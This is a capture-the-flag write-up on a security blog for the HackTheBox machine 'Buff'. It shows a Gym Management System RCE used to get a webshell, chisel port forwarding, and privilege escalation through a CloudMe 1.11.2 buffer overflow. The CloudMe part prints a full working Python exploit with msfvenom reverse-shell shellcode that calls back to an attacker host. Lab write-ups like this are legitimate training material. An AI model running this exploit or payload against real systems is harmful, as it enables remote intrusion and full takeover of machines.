SecJournal
  • 👋Welcome
    • SecJournal
    • About Me
  • 👨‍💻Blogs
    • My Blogs
      • Malware
        • Fake WinRAR 0-Day
        • Github 0 Days
      • Scams
        • Social Engineering
        • May Chong
        • Liu Hongtian
        • Packing Green
        • Richard Spindler
        • Ukraine
        • Coalition Tech
        • Telegram Customer Service
      • Exploits
      • Random
        • Upgrade Shells
    • Course Reviews
      • OSCP / PEN-200 Review
      • Certified Red Team Operator (CRTO) Review
      • Certified Red Team Expert (CRTE) Review
      • OSWE / WEB-300 Review
      • OSED / EXP-301 Review
  • 🔐What is Security
    • Information Security
    • Getting Started
      • CTFs
      • Hacking
  • 🖱️Website Security
    • Disclosed Bugs
      • Dutch Government
      • Algolia API Misconfiguration
    • Web
      • MVC Framework
    • SQL Injection
      • Portswigger Labs
    • Access Control
      • Portswigger Labs
    • Authentication Bypass
      • Portswigger Labs
    • Business Logic
      • Portswigger Labs
    • Information Disclosure
      • Portswigger Labs
    • Directory Traversal
      • Portswigger Labs
    • Command Injection
      • Portswigger Labs
    • File Upload Vulnerabilities
      • Portswigger Labs
    • Server-Side Request Forgery
      • Portswigger Labs
    • Cross-Origin Resource Sharing
      • Portswigger Labs
    • Cross-Site Request Forgery
      • Portswigger Labs
    • Cross-Site Scripting
      • Portswigger XSS Labs
      • Portswigger DOM-XSS Labs
    • JSON Web Tokens
      • Portswigger Labs
    • API Testing
      • Portswigger Labs
    • WebSockets
      • Portswigger Labs
    • Deserialization
      • Portswigger Labs
    • Prototype Pollution
      • Portswigger Labs
    • Server-Side Template Injection
      • Portswigger Labs
    • XXE Injection
      • Portswigger Labs
    • Web Cache Poisoning
      • Portswigger Labs
    • HTTP Request Smuggling
      • Portswigger Labs
    • OAuth Authentication
      • Portswigger Labs
  • 👀Buffer Overflows
    • Buffer Overflows
      • System Architecture
      • Compilers, Assemblers, Debuggers and Decompilers
      • Binary Security
      • Address Manipulation
    • OSCP BOF (OUTDATED)
    • Ret2Libc
    • ROP Chaining
    • Canary Bypass
    • ASLR Bypass
  • 🖥️Active Directory
    • Active Directory
    • Tools
    • Windows Authentication
    • Kerberos
      • Delegation
      • Attacking Kerberos
    • ACLs and GPOs
      • Abusing ACLs and GPOs
    • LDAP
  • ✍️Writeups
    • HTB Season 3
      • Analytics
      • Appsanity
      • Codify
      • Devvortex
      • Drive
      • Hospital
      • Manager
      • Napper
      • Surveillance
      • Visual
    • HTB Season 2
      • Authority
      • Bookworm
      • Cozyhosting
      • Cybermonday
      • Download
      • Gofer
      • Intentions
      • Keeper
      • Pilgrimage
      • Rebound
      • RegistryTwo
      • Sandworm
      • Sau
      • Zipping
    • HTB Season 1
      • Agile
      • Busqueda
      • Cerberus
      • Coder
      • Format
      • Inject
      • Mailroom
      • MonitorsTwo
      • OnlyForYou
      • PC
      • Socket
      • Snoopy
    • HackTheBox
      • Easy
        • Academy
        • Access
        • Active
        • Admirer
        • Antique
        • Arctic
        • Armageddon
        • Backdoor
        • Bank
        • Bashed
        • Bastion
        • Blue
        • Blocky
        • Blunder
        • Bounty
        • Broker
        • Buff
        • Curling
        • Doctor
        • Driver
        • Explore
        • Forest
        • FriendZone
        • Frolic
        • GoodGames
        • Granny
        • Heist
        • Help
        • Horizontall
        • Irked
        • Jerry
        • Knife
        • Laboratory
        • Legacy
        • Luanne
        • Love
        • Mirai
        • MetaTwo
        • Nest
        • Netmon
        • Networked
        • Nibbles
        • NodeBlog
        • Omni
        • OpenAdmin
        • OpenSource
        • Optimum
        • Paper
        • Pandora
        • Photobomb
        • Postman
        • Precious
        • Previse
        • RedPanda
        • Remote
        • Return
        • RouterSpace
        • Sauna
        • ScriptKiddie
        • Secret
        • Sense
        • Servmon
        • Shoppy
        • Support
        • Soccer
        • Spectra
        • Squashed
        • SteamCloud
        • Stocker
        • SwagShop
        • Tabby
        • Timelapse
        • Toolbox
        • Topology
        • Traceback
        • Trick
        • TwoMillion
        • Valentine
        • Validation
        • Wifinetic
        • Writeup
      • Medium
        • Ambassador
        • Arkham
        • Atom
        • Backend
        • BackendTwo
        • Bagel
        • Bart
        • Bastard
        • Book
        • BroScience
        • Bucket
        • Cache
        • Canape
        • Cascade
        • Catch
        • Chaos
        • Chatterbox
        • Clicker
        • Cronos
        • Devoops
        • dynstr
        • Encoding
        • Epsilon
        • Escape
        • Faculty
        • Forge
        • Forgot
        • Fuse
        • Giddy
        • Haircut
        • Hawk
        • Intelligence
        • Interface
        • Investigation
        • Jeeves
        • Json
        • Jupiter
        • Lazy
        • Lightweight
        • Magic
        • Mentor
        • Meta
        • Monteverde
        • Nineveh
        • Noter
        • Obscurity
        • October
        • Ophiuchi
        • Outdated
        • Passage
        • Pit
        • Poison
        • Popcorn
        • Querier
        • Ransom
        • Resolute
        • Retired
        • Schooled
        • Scrambled
        • Shared
        • Shibboleth
        • Silo
        • SolidState
        • StreamIO
        • TartarSauce
        • Tenet
        • TheNotebook
        • Time
        • Unattended
        • Undetected
        • Unicode
        • Union
        • UpDown
        • Vault
      • Hard
        • Acute
        • Blackfield
        • BreadCrumbs
        • CarpeDiem
        • Extension
        • Falafel
        • Flight
        • Holiday
        • Kotarak
        • Mantis
        • Monitors
        • Object
        • Oouch
        • Pikaboo
        • Pollution
        • Quick
        • RainyDay
        • Reel
        • Registry
        • Search
        • Seventeen
        • Talkative
        • Unobtainium
        • Vessel
        • Zipper
      • Insane
        • Absolute
        • Anubis
        • APT
        • BrainFuck
        • CrossFit
        • Derailed
        • Fighter
        • Fulcrum
        • Hathor
        • Multimaster
        • pivotapi
        • Sekhmet
        • Sink
        • Sizzle
        • Stacked
    • Proving Grounds Practice
      • Windows
        • Access
        • Algernon
        • AuthBy
        • BillyBoss
        • Butch
        • Craft
        • Craft2
        • DVR4
        • Heist
        • Helpdesk
        • Hutch
        • Internal
        • Jacko
        • Kevin
        • Medjed
        • Nickel
        • Resourced
        • Shenzi
        • Slort
        • Squid
        • Symbolic
        • Vault
        • Vector
      • Linux
        • Apex
        • BadCorp
        • Banzai
        • Blackgate
        • Bratarina
        • Breakout
        • BunyIP
        • Cassios
        • Catto
        • Charlotte
        • Chatty
        • ClamAV
        • Cobweb
        • CookieCutter
        • Deployer
        • Depreciated
        • Develop
        • Dibble
        • Escape
        • Exfiltrated
        • Exghost
        • Fail
        • Fantastic
        • Flasky
        • Forward
        • Hawat
        • Hetemit
        • Hunit
        • Illusion
        • Injecto
        • KeyVault
        • G00g
        • Malbec
        • Mantis
        • Maria
        • Matrimony
        • Megavolt
        • Muddy
        • Nappa
        • Nukem
        • Payday
        • Pebbles
        • Pelican
        • Peppo
        • Phobos
        • Postfish
        • PlanetExpress
        • QuackerJack
        • Readys
        • Reconstruction
        • Roquefort
        • Sirol
        • Shiftdel
        • Shifty
        • Snookums
        • Sona
        • Sorcerer
        • Spaghetti
        • Splodge
        • Surf
        • Sybaris
        • Synapse
        • Tico
        • Thor
        • Twiggy
        • UC404
        • VoIP
        • Walla
        • Wheels
        • XposedAPI
        • ZenPhoto
        • Zino
  • 🐍Evasion
    • Evasion
      • Windows Fundamentals
      • Detection
      • Malware Techniques
  • 🔺Adversary Emulation
    • Red Teaming
      • Adversary Emulation
Powered by GitBook
On this page
  • Gaining Access
  • Gym
  • Privilege Escalation
  • CloudMe
  1. Writeups
  2. HackTheBox
  3. Easy

Buff

PreviousBrokerNextCurling

Gaining Access

Nmap Scan:

Gym

On port 8080, it was a gym-related page:

We can use gobuster on the website to find more directories:

Checking the contact.php file, we see the software used to make this.

Then, we can search for exploits for this Gym Management Software 1.0.

We can try the RCE exploit:

By running the exploit, we would gain a webshell:

Afterwards, we can download nc.exe onto the machine via smbserver.py.

Privilege Escalation

CloudMe

When enumerating the user's directory, we find a CloudMe_1112.exe file:

C:\Users\shaun\Downloads>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

14/07/2020  13:27    <DIR>          .
14/07/2020  13:27    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   7,564,353,536 bytes free

When checking for exploits regarding CloudMe, we can find a few Buffer Overflow exploits that can be used for RCE using shellcode.

CloudMe for this machine runs on port 8888 on this machine, so we can just run it and use chisel to port forward port 8888.

# on Kali
chisel server --port 4444 --reverse

# on host
.\chisel.exe client 10.10.14.2:4444 R:8888:localhost:8888

Then, we need to generate new shellcode for the exploit:

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload

The final script based on the PoC should look like this:

# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86

#Instructions:
# Start the CloudMe service and run the script.

import socket

target = "127.0.0.1"

padding1   = b"\x90" * 1052
EIP        = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS       = b"\x90" * 30

#msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
payload = b""
payload += b"\xdb\xc0\xb8\x78\xb6\x92\xc4\xd9\x74\x24\xf4"
payload += b"\x5b\x29\xc9\xb1\x52\x31\x43\x17\x03\x43\x17"
payload += b"\x83\x93\x4a\x70\x31\x9f\x5b\xf7\xba\x5f\x9c"
payload += b"\x98\x33\xba\xad\x98\x20\xcf\x9e\x28\x22\x9d"
payload += b"\x12\xc2\x66\x35\xa0\xa6\xae\x3a\x01\x0c\x89"
payload += b"\x75\x92\x3d\xe9\x14\x10\x3c\x3e\xf6\x29\x8f"
payload += b"\x33\xf7\x6e\xf2\xbe\xa5\x27\x78\x6c\x59\x43"
payload += b"\x34\xad\xd2\x1f\xd8\xb5\x07\xd7\xdb\x94\x96"
payload += b"\x63\x82\x36\x19\xa7\xbe\x7e\x01\xa4\xfb\xc9"
payload += b"\xba\x1e\x77\xc8\x6a\x6f\x78\x67\x53\x5f\x8b"
payload += b"\x79\x94\x58\x74\x0c\xec\x9a\x09\x17\x2b\xe0"
payload += b"\xd5\x92\xaf\x42\x9d\x05\x0b\x72\x72\xd3\xd8"
payload += b"\x78\x3f\x97\x86\x9c\xbe\x74\xbd\x99\x4b\x7b"
payload += b"\x11\x28\x0f\x58\xb5\x70\xcb\xc1\xec\xdc\xba"
payload += b"\xfe\xee\xbe\x63\x5b\x65\x52\x77\xd6\x24\x3b"
payload += b"\xb4\xdb\xd6\xbb\xd2\x6c\xa5\x89\x7d\xc7\x21"
payload += b"\xa2\xf6\xc1\xb6\xc5\x2c\xb5\x28\x38\xcf\xc6"
payload += b"\x61\xff\x9b\x96\x19\xd6\xa3\x7c\xd9\xd7\x71"
payload += b"\xd2\x89\x77\x2a\x93\x79\x38\x9a\x7b\x93\xb7"
payload += b"\xc5\x9c\x9c\x1d\x6e\x36\x67\xf6\x9b\xcd\x69"
payload += b"\x04\xf4\xd3\x75\x09\xbf\x5d\x93\x63\xaf\x0b"
payload += b"\x0c\x1c\x56\x16\xc6\xbd\x97\x8c\xa3\xfe\x1c"
payload += b"\x23\x54\xb0\xd4\x4e\x46\x25\x15\x05\x34\xe0"
payload += b"\x2a\xb3\x50\x6e\xb8\x58\xa0\xf9\xa1\xf6\xf7"
payload += b"\xae\x14\x0f\x9d\x42\x0e\xb9\x83\x9e\xd6\x82"
payload += b"\x07\x45\x2b\x0c\x86\x08\x17\x2a\x98\xd4\x98"
payload += b"\x76\xcc\x88\xce\x20\xba\x6e\xb9\x82\x14\x39"
payload += b"\x16\x4d\xf0\xbc\x54\x4e\x86\xc0\xb0\x38\x66"
payload += b"\x70\x6d\x7d\x99\xbd\xf9\x89\xe2\xa3\x99\x76"
payload += b"\x39\x60\xa9\x3c\x63\xc1\x22\x99\xf6\x53\x2f"
payload += b"\x1a\x2d\x97\x56\x99\xc7\x68\xad\x81\xa2\x6d"
payload += b"\xe9\x05\x5f\x1c\x62\xe0\x5f\xb3\x83\x21"

overrun    = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))       

buf = padding1 + EIP + NOPS + payload + overrun 

try:
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target,8888))
        s.send(buf)
except Exception as e:
        print(sys.exc_value)

Afterwards, run it using python3 and an administrator shell will spawn.

Rooted!

✍️
Gym Management System 1.0 - Unauthenticated Remote Code ExecutionExploit Database
Logo
CloudMe 1.11.2 - Buffer Overflow (PoC)Exploit Database
Logo